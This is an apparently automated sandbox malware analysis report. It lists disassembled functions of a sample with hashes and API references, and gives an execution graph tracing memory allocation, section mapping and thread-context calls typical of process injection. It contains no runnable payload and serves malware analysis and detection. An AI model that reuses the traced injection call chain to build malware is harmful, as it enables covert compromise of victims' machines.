                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustPointer_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1721217611-0
                                                                                                                        • Opcode ID: a4e3c56bb2504ef712958fe4fc36a97053b85d3a7639f88f27d72acbdca71bf4
                                                                                                                        • Instruction ID: 8c7966189364fe5b0b916348116d5b5040dde5b70b0cb25522d068c10d67d051
                                                                                                                        • Opcode Fuzzy Hash: a4e3c56bb2504ef712958fe4fc36a97053b85d3a7639f88f27d72acbdca71bf4
                                                                                                                        • Instruction Fuzzy Hash: 3A4195352043069EDB249F25E881B6777A49F11314F24007FF901BA7E2DB3AD8E1D65E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00415AE0 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00415B14
                                                                                                                        • __isleadbyte_l.LIBCMT ref: 00415B42
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,00000000,00000000,?,00000000,00000000,?), ref: 00415B70
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,00000000,00000000,?,00000000,00000000,?), ref: 00415BA6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3058430110-0
                                                                                                                        • Opcode ID: 0e42bbe1f355a8a6b3771a7f1b933b69347daf39615f1d8abb4cb4c623395d1c
                                                                                                                        • Instruction ID: ac97cd2b71f638b443c6b0e320e97b735720a61c493227f45bc640eeaaea9447
                                                                                                                        • Opcode Fuzzy Hash: 0e42bbe1f355a8a6b3771a7f1b933b69347daf39615f1d8abb4cb4c623395d1c
                                                                                                                        • Instruction Fuzzy Hash: A931D031608A06EFDB218F75CC44BEB7BB5FF80320F15456AE460972A0E734E991DB98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00409AB4 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___BuildCatchObject.LIBCMT ref: 00409ACB
                                                                                                                          • Part of subcall function 0040A0ED: ___AdjustPointer.LIBCMT ref: 0040A136
                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 00409AE2
                                                                                                                        • ___FrameUnwindToState.LIBCMT ref: 00409AF4
                                                                                                                        • CallCatchBlock.LIBCMT ref: 00409B18
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2633735394-0
                                                                                                                        • Opcode ID: cb47ac20146aa087d26cabfdd2ed9b91858495d71a94fef415c5fc905684577a
                                                                                                                        • Instruction ID: ee1dbabd2e158ac4d2e67c5336daa60a922a79536d8aa3ab9774724638c910d3
                                                                                                                        • Opcode Fuzzy Hash: cb47ac20146aa087d26cabfdd2ed9b91858495d71a94fef415c5fc905684577a
                                                                                                                        • Instruction Fuzzy Hash: 4F011732000149BBCF12AF56CC01EDB3BBAFF48754F15802AF95861161D77AE861EBA9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004105F6 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3016257755-0
                                                                                                                        • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                        • Instruction ID: c4c89c5c62088a65dc993aa0cd905556d973812a2f236859a29f03504a9a1435
                                                                                                                        • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                        • Instruction Fuzzy Hash: 49014B7200014EBBCF165E94CC01CEE3F76BB59354F58851AFA5898131D27BC9F1AB89
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0041027A Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __lock.LIBCMT ref: 004102BE
                                                                                                                          • Part of subcall function 00409657: __mtinitlocknum.LIBCMT ref: 00409669
                                                                                                                          • Part of subcall function 00409657: EnterCriticalSection.KERNEL32(00000000,?,004102C3,0000000D), ref: 00409682
                                                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 004102CB
                                                                                                                        • __lock.LIBCMT ref: 004102DF
                                                                                                                        • ___addlocaleref.LIBCMT ref: 004102FD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1687444384-0
                                                                                                                        • Opcode ID: 1f200a260491d72330b6d2cb47b2950cffcd587b9a9effd7ba43696811beccdd
                                                                                                                        • Instruction ID: 18857926dce3371e009c2d52e2dc5d0b2a7b6d965f972cefbd74dc7357e23b08
                                                                                                                        • Opcode Fuzzy Hash: 1f200a260491d72330b6d2cb47b2950cffcd587b9a9effd7ba43696811beccdd
                                                                                                                        • Instruction Fuzzy Hash: C9016171500B00DFD7209F66D805789B7F0AF54325F20891FE4AA963E1CBB8AA84CB09
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004050F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004028F0: _memmove.LIBCMT ref: 004029BE
                                                                                                                        • _memmove.LIBCMT ref: 0040519C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                        • Opcode ID: 561e0ee8829434c9549f81183fb6b4215faafa5ba0da433c924ced4df5dbb528
                                                                                                                        • Instruction ID: 35a9fb9f3f02b229400c85453a10d2f0da0fe7547ae8a4d99f5b113dbeb1a559
                                                                                                                        • Opcode Fuzzy Hash: 561e0ee8829434c9549f81183fb6b4215faafa5ba0da433c924ced4df5dbb528
                                                                                                                        • Instruction Fuzzy Hash: 9F318F327006049BD7249E1CD880B5BB7AAEF91714B608A3FE551EF2C1CB79D9418BA8
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004161D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?), ref: 00416238
                                                                                                                        • _free.LIBCMT ref: 0041626B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide_free
                                                                                                                        • String ID: VWj
                                                                                                                        • API String ID: 3242298965-3488467141
                                                                                                                        • Opcode ID: 1ecdfe88422f94fd532258db9d154171434ab07853eecb01cc71287c4fb9c655
                                                                                                                        • Instruction ID: 5923012caadd374d5684bfada8950495edb10755a258a388a5eb54e0f84a2d30
                                                                                                                        • Opcode Fuzzy Hash: 1ecdfe88422f94fd532258db9d154171434ab07853eecb01cc71287c4fb9c655
                                                                                                                        • Instruction Fuzzy Hash: 51110A35B001409FC721CFADD8C48DE7FB2AB9531473A459AE895DB346C635D842CB54
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040201B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00401FEC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw
                                                                                                                        • String ID: ios_base::badbit set$pA
                                                                                                                        • API String ID: 2005118841-3406655481
                                                                                                                        • Opcode ID: 3e73dbd9d68a69327fbb4684fa7b7da57cc62c3f6abbd682cfcba3fa557ddabb
                                                                                                                        • Instruction ID: c8fda5f9fe7043d11bc572f67169b0b8b833b586247de635247e3ecd103ffe97
                                                                                                                        • Opcode Fuzzy Hash: 3e73dbd9d68a69327fbb4684fa7b7da57cc62c3f6abbd682cfcba3fa557ddabb
                                                                                                                        • Instruction Fuzzy Hash: F8117071A002069FEB14CF58C585B69B7B0BF40358F64C17AE615AB2D2C7B9ED81CB48
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405949 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040591A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw
                                                                                                                        • String ID: ios_base::badbit set$pA
                                                                                                                        • API String ID: 2005118841-3406655481
                                                                                                                        • Opcode ID: 2e217378032a6f0d1a20d01c2c4da4da847a5952c93a0a3391aa4feea563daa9
                                                                                                                        • Instruction ID: 0419535567d013a683a9a16403f1a62f48201a5c2d5247e63aab9edf8040a06e
                                                                                                                        • Opcode Fuzzy Hash: 2e217378032a6f0d1a20d01c2c4da4da847a5952c93a0a3391aa4feea563daa9
                                                                                                                        • Instruction Fuzzy Hash: A71151B1A00606CFEB04DF58C481B5AB3B0FB44328F64C56AE515AB282C778D955CF58
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004161C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?), ref: 00416238
                                                                                                                        • _free.LIBCMT ref: 0041626B
                                                                                                                          • Part of subcall function 00407AE6: HeapFree.KERNEL32(00000000,00000000,?,0041026B,00000000,00000001,00000000,?,?,?,004087B6,00406914,00000000), ref: 00407AFA
                                                                                                                          • Part of subcall function 00407AE6: GetLastError.KERNEL32(00000000,?,0041026B,00000000,00000001,00000000,?,?,?,004087B6,00406914,00000000), ref: 00407B0C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharErrorFreeHeapLastMultiWide_free
                                                                                                                        • String ID: VWj
                                                                                                                        • API String ID: 603669072-3488467141
                                                                                                                        • Opcode ID: 5202277449832971603c87f80990f66ca3f7f776ba10bd22c8735ea133f22ffa
                                                                                                                        • Instruction ID: 5ba66fdf6855539c92f8454dfe1a2cc4dc6058e36318942371d6dc00c7a57d3b
                                                                                                                        • Opcode Fuzzy Hash: 5202277449832971603c87f80990f66ca3f7f776ba10bd22c8735ea133f22ffa
                                                                                                                        • Instruction Fuzzy Hash: A3F0FC367001149BCB209F5DE8C5CDE77B6BFC4320B264526F824EB380CA34DC818B54
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040DCF1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __FF_MSGBANNER.LIBCMT ref: 0040DCF4
                                                                                                                          • Part of subcall function 0040D7CA: __NMSG_WRITE.LIBCMT ref: 0040D7F1
                                                                                                                          • Part of subcall function 0040D7CA: __NMSG_WRITE.LIBCMT ref: 0040D7FB
                                                                                                                        • __NMSG_WRITE.LIBCMT ref: 0040DCFC
                                                                                                                          • Part of subcall function 0040D827: GetModuleFileNameW.KERNEL32(00000000,0042A62A,00000104,?,00000001,00000000), ref: 0040D8B9
                                                                                                                          • Part of subcall function 0040D827: ___crtMessageBoxW.LIBCMT ref: 0040D967
                                                                                                                          • Part of subcall function 0040DDBC: _doexit.LIBCMT ref: 0040DDC6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileMessageModuleName___crt_doexit
                                                                                                                        • String ID: EUA
                                                                                                                        • API String ID: 288729343-1325878830
                                                                                                                        • Opcode ID: 4add77ddc967bf1f1939d45f323dbfaa7e7fda842892029aff83f61113827601
                                                                                                                        • Instruction ID: 71dbc6ad582759cbadfd251b6f59fae28df03b1ed6edf287d547cd0b1cd3e64a
                                                                                                                        • Opcode Fuzzy Hash: 4add77ddc967bf1f1939d45f323dbfaa7e7fda842892029aff83f61113827601
                                                                                                                        • Instruction Fuzzy Hash: 27B0922185024D6AE5843BF78C07A683628AF00B2EF50503E7634294D79EB868881099
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:1.2%
                                                                                                                        Dynamic/Decrypted Code Coverage:1.7%
                                                                                                                        Signature Coverage:10.7%
                                                                                                                        Total number of Nodes:410
                                                                                                                        Total number of Limit Nodes:40
                                                                                                                        execution_graph 96392 426a43 96394 426aa0 96392->96394 96393 426ad7 96394->96393 96397 423323 96394->96397 96396 426ab9 96398 4232b1 96397->96398 96399 42332f 96397->96399 96401 4232d4 96398->96401 96402 42a133 96398->96402 96401->96396 96405 4284e3 96402->96405 96404 42a164 96404->96401 96406 428504 96405->96406 96407 428549 96405->96407 96414 4293b3 96406->96414 96408 4293b3 LdrLoadDll 96407->96408 96410 42855f 96408->96410 96410->96404 96411 428521 96418 40b7b3 96411->96418 96413 428542 96413->96404 96416 4293c2 96414->96416 96417 429428 96414->96417 96416->96417 96422 423da3 96416->96422 96417->96411 96421 40b7d8 96418->96421 96419 40b8f5 NtAllocateVirtualMemory 96420 40b920 96419->96420 96420->96413 96421->96419 96423 423db1 96422->96423 96424 423dbd 96422->96424 96423->96424 96427 424223 LdrLoadDll 96423->96427 96424->96417 96426 423f0f 96426->96417 96427->96426 96428 42b743 96431 429db3 96428->96431 96432 429dd9 96431->96432 96443 4162d3 96432->96443 96434 429def 96442 429e40 96434->96442 96446 41a373 96434->96446 96436 429e0e 96437 429e23 96436->96437 96462 428703 96436->96462 96458 426183 96437->96458 96440 429e32 96441 428703 2 API calls 96440->96441 96441->96442 96445 4162e0 96443->96445 96466 416223 96443->96466 96445->96434 96447 41a39f 96446->96447 96504 417733 96447->96504 96449 41a3b1 96508 41a263 96449->96508 96452 41a3e4 96454 41a3f5 96452->96454 96457 4283b3 2 API calls 96452->96457 96453 41a3cc 96455 41a3d7 96453->96455 96518 4283b3 96453->96518 96454->96436 96455->96436 96457->96454 96459 4261dd 96458->96459 96460 4261ea 96459->96460 96540 417ee3 96459->96540 96460->96440 96463 42871d 96462->96463 96464 4293b3 LdrLoadDll 96463->96464 96465 42872e ExitProcess 96464->96465 96465->96437 96467 41623a 96466->96467 96483 425253 LdrLoadDll 96466->96483 96473 4252b3 96467->96473 96470 416246 96472 416253 96470->96472 96476 428d43 96470->96476 96472->96445 96484 428623 96473->96484 96478 428d5b 96476->96478 96477 428d7f 96477->96472 96478->96477 96488 427ae3 96478->96488 96483->96467 96485 42863d 96484->96485 96486 4293b3 LdrLoadDll 96485->96486 96487 4252d0 96486->96487 96487->96470 96489 427b00 96488->96489 96490 4293b3 LdrLoadDll 96489->96490 96491 427b11 96490->96491 96497 b92c0a 96491->96497 96492 427b2c 96494 42a1c3 96492->96494 96500 4286b3 96494->96500 96496 428ded 96496->96472 96498 b92c1f LdrInitializeThunk 96497->96498 96499 b92c11 96497->96499 96498->96492 96499->96492 96501 4286cd 96500->96501 96502 4293b3 LdrLoadDll 96501->96502 96503 4286de RtlFreeHeap 96502->96503 96503->96496 96505 417779 96504->96505 96522 4175c3 LdrLoadDll 96505->96522 96507 41780c 96507->96449 96509 41a359 96508->96509 96510 41a27d 96508->96510 96509->96452 96509->96453 96523 417683 96510->96523 96512 41a2c2 96528 427b33 96512->96528 96514 41a307 96532 427b83 96514->96532 96517 4283b3 2 API calls 96517->96509 96519 4283cd 96518->96519 96520 4293b3 LdrLoadDll 96519->96520 96521 4283de NtClose 96520->96521 96521->96455 96522->96507 96524 4176a8 96523->96524 96525 4176b3 96524->96525 96538 4175c3 LdrLoadDll 96524->96538 96525->96512 96527 4176fb 96527->96512 96529 427b50 96528->96529 96530 4293b3 LdrLoadDll 96529->96530 96531 427b61 96530->96531 96531->96514 96533 427ba0 96532->96533 96534 4293b3 LdrLoadDll 96533->96534 96535 427bb1 96534->96535 96539 b935c0 LdrInitializeThunk 96535->96539 96536 41a34d 96536->96517 96538->96527 96539->96536 96542 417f08 96540->96542 96565 41837b 96542->96565 96566 4232b3 96542->96566 96543 417fac 96543->96565 96569 413cf3 96543->96569 96545 41801a 96546 42a1c3 2 API calls 96545->96546 96545->96565 96549 418032 96546->96549 96547 418064 96553 41806b 96547->96553 96586 41a403 96547->96586 96549->96547 96582 406db3 96549->96582 96550 4180a4 96550->96565 96593 427c83 96550->96593 96553->96565 96602 427773 96553->96602 96555 418101 96611 4277f3 96555->96611 96557 418121 96558 41830a 96557->96558 96620 406e23 96557->96620 96561 41832d 96558->96561 96628 4278f3 96558->96628 96563 41834a 96561->96563 96624 41a5d3 96561->96624 96564 428703 2 API calls 96563->96564 96564->96565 96565->96460 96567 42a133 2 API calls 96566->96567 96568 4232d4 96567->96568 96568->96543 96570 413d12 96569->96570 96572 413d59 96569->96572 96571 413e67 96570->96571 96570->96572 96577 41a5d3 2 API calls 96570->96577 96571->96545 96572->96571 96575 413e30 96572->96575 96637 413493 96572->96637 96575->96571 96654 41a673 LdrLoadDll RtlFreeHeap LdrInitializeThunk 96575->96654 96576 413e44 96576->96571 96655 41a673 LdrLoadDll RtlFreeHeap LdrInitializeThunk 96576->96655 96577->96570 96579 413e5d 96579->96545 96580 413d96 96580->96575 96650 413753 96580->96650 96583 406de3 96582->96583 96584 41a5d3 2 API calls 96583->96584 96585 406e04 96583->96585 96584->96583 96585->96547 96587 41a420 96586->96587 96670 427bd3 96587->96670 96589 41a470 96590 41a477 96589->96590 96591 427c83 2 API calls 96589->96591 96590->96550 96592 41a4a0 96591->96592 96592->96550 96594 427cf9 96593->96594 96595 427ca4 96593->96595 96596 4293b3 LdrLoadDll 96594->96596 96597 4293b3 LdrLoadDll 96595->96597 96598 427d0f 96596->96598 96599 427cc1 96597->96599 96598->96553 96683 40aac3 96599->96683 96601 427cf2 96601->96553 96603 4277c9 96602->96603 96604 427794 96602->96604 96605 4293b3 LdrLoadDll 96603->96605 96606 4293b3 LdrLoadDll 96604->96606 96608 4277df 96605->96608 96607 4277b1 96606->96607 96687 40a063 96607->96687 96608->96555 96610 4277c2 96610->96555 96612 427811 96611->96612 96613 427846 96611->96613 96615 4293b3 LdrLoadDll 96612->96615 96614 4293b3 LdrLoadDll 96613->96614 96616 42785c 96614->96616 96617 42782e 96615->96617 96616->96557 96691 40a273 96617->96691 96619 42783f 96619->96557 96621 406e43 96620->96621 96622 41a5d3 2 API calls 96621->96622 96623 406e63 96621->96623 96622->96621 96623->96558 96625 41a5e6 96624->96625 96695 427a13 96625->96695 96627 41a611 96627->96561 96629 427914 96628->96629 96630 427949 96628->96630 96631 4293b3 LdrLoadDll 96629->96631 96632 4293b3 LdrLoadDll 96630->96632 96633 427931 96631->96633 96634 42795f 96632->96634 96708 40a483 96633->96708 96634->96561 96636 427942 96636->96561 96638 4134a3 96637->96638 96639 41349e 96637->96639 96640 42a133 2 API calls 96638->96640 96639->96580 96643 4134c8 96640->96643 96641 41352f 96641->96580 96643->96641 96644 413535 96643->96644 96648 42a133 2 API calls 96643->96648 96656 427a93 96643->96656 96662 4285d3 96643->96662 96645 41355f 96644->96645 96647 4285d3 2 API calls 96644->96647 96645->96580 96649 413550 96647->96649 96648->96643 96649->96580 96651 41376f 96650->96651 96652 4285d3 2 API calls 96651->96652 96653 413775 96652->96653 96653->96575 96654->96576 96655->96579 96657 427aad 96656->96657 96658 4293b3 LdrLoadDll 96657->96658 96659 427abe 96658->96659 96668 b92df0 LdrInitializeThunk 96659->96668 96660 427ad5 96660->96643 96663 4285f0 96662->96663 96664 4293b3 LdrLoadDll 96663->96664 96665 428601 96664->96665 96669 b92c70 LdrInitializeThunk 96665->96669 96666 428618 96666->96643 96668->96660 96669->96666 96671 427bf1 96670->96671 96672 427c3a 96670->96672 96673 4293b3 LdrLoadDll 96671->96673 96674 4293b3 LdrLoadDll 96672->96674 96675 427c0e 96673->96675 96677 427c50 96674->96677 96679 40a8a3 96675->96679 96677->96589 96678 427c33 96678->96589 96681 40a8c8 96679->96681 96680 40a9e5 NtCreateSection 96682 40aa14 96680->96682 96681->96680 96682->96678 96684 40aae8 96683->96684 96685 40ac05 NtMapViewOfSection 96684->96685 96686 40ac40 96685->96686 96686->96601 96690 40a088 96687->96690 96688 40a1a5 NtGetContextThread 96689 40a1c0 96688->96689 96689->96610 96690->96688 96694 40a298 96691->96694 96692 40a3b5 NtSetContextThread 96693 40a3d0 96692->96693 96693->96619 96694->96692 96696 427a34 96695->96696 96697 427a69 96695->96697 96699 4293b3 LdrLoadDll 96696->96699 96698 4293b3 LdrLoadDll 96697->96698 96700 427a7f 